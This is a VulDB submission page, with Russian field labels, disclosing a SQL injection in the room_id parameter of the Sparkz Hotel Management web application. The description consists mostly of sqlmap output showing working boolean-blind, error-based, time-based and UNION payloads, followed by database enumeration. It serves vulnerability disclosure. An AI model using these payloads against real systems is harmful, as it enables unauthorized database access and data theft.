| Название | Sparkz-Hotel-Management-Sqlinjection |
|---|
| Описание | Sparkz-Hotel-Management-Sqlinjection
Sql injection exists in the Sparkz-Hotel-Management background room management office
The parameter is“room_id”
Sqlmap Attack:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: room_id=1' AND 9895=9895 AND 'PWpx'='PWpx&cutomerDetails=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: room_id=1' AND (SELECT 6265 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(6265=6265,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XdsA'='XdsA&cutomerDetails=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: room_id=1' AND (SELECT 1001 FROM (SELECT(SLEEP(5)))bHDF) AND 'RTwo'='RTwo&cutomerDetails=
Type: UNION query
Title: Generic UNION query (NULL) - 24 columns
Payload: room_id=-9083' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7071,0x4b726971455679645047596864785869574e477a534a6b54517166705a454759614c5376504d634a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&cutomerDetails=
---
[14:55:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
[14:55:48] [INFO] fetching database names
available databases [1]:
[*] information_schema |
|---|
| Источник | ⚠️ https://github.com/gdianq/Sparkz-Hotel-Management-Sqlinjection/tree/main |
|---|
| Пользователь | gdianq (UID 30613) |
|---|
| Представление | 04.08.2022 09:26 (4 лет назад) |
|---|
| Модерация | 04.08.2022 09:49 (23 minutes later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 205595 [SourceCodester Multi Language Hotel Management Software room_id SQL-инъекция] |
|---|
| Баллы | 20 |
|---|